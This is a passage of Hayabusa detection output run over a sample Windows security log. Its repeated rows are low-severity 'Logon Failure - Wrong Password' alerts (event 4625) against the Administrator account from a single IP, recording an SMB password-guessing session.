NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MDBaKpfYttm4H1gj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PNszt6piEznMlTdF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iqmBPOQIG6M1rZjX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BJs7tuZpsPMYJHOD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LUT5oe2DwS5vW84K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:17.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3OTe0uiDHhf5GzRL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 71TuxFRZFyZEQp1S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xRvTmizOLj3UUpD7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LnQEZPWaN2OkpTLa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HnHR9DAtgzu561sx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DfBl3dbluZ7GiFum : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Hlgn7gsZwRvlXAk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eyHVPtGpnmmRjJuO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F0l3QC0rLt9yGaIe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XfEng3JgXLmgI8GN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.334 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ORIegzlkHy8AX6RW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:18.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AzS4xRnHKxSwz5sZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.415 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v0hA1XvRIlqwKG6g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mKXKkvlHvjRh33Vw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JIMTGRC5IQlkrG9c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.658 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NYcLsxwbg8LkGCuQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kmttijRBtXqEbU0W : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.765 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXC3hYI1Gin59gvG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hQiozAIr9Jgklmks : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O598IvZRpbdU1liO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xlmYWrAnn3sUNSRk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0aAAkO0uOGIq8zVM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:18.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 26K4BIpgUbBNWbDM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: moW3Ts7edqoQ9XeU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l8C4d3xE0QkWywbf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.086 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K1EgYFhtgrcjtcXM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7avpgQeA0KCIme9Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YFgmt3OEw4cDfPhG : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.214 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OqITdE5K63nJg9tg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zBs4fYCiprxgDd43 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VtBD0Q2szeURxMYA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.502 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KPUi2NhPP92Rs3hy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2PrbMf9E0fOuwIB8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:19.613 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 807zsxQ9WETO9YIp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZGMJKRYUlmijJV40 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xv33to031A0fQzX2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IT0bzycur7HXFeLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kyY2K7tT0HgQ1ZL3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6aexuFPH6FyEZ1bN : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o8Iojas6sznqlYUE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U2SnliYkmx59ACSM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2plWY1GZHilHv5Vh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XIfmqihMJdPVz80p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Odg692Eyde8md0t7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:20.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gsQNvf5HkRQnbDul : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: il2DGq3bzfwGuJN4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.183 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9OsQFOcIyougrx0E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gR8wpQrGYzd4NrBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KFjRsjWXbEPs9m1I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wbjudOy3rWefzAIv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Q4gc8keCTv2HeE3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SmsaxHrHYuofUhAH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CvhWasTJYmChfsNU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DszGfEo9aua2y5UC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lZPScjxczbrcJuvJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:20.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ucpjxJV4rBXOxy4e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BmTtDfX05VsKFrON : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HhWSUkQhv089RSfJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i8RXCiXQYgjuPO78 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pfB3u3Np38FOw6hc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I9GcSmto4jdCIw6H : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HsogJdHUcldt7JeH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IUbkohKtCy6joOBY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.954 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9ZFyYxBrKnz652Co : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QQ2MHr71xALFHJqN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cgjHOgEYRLQiJX75 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:21.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QXLjSNCeDAaX4ttQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: np6hwdqnWLJawVn9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: adqqChrYx3lZ0BAa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1GTXkOnNYTws1MiC : IP Address: 192.168.198.149 : AuthPackage: 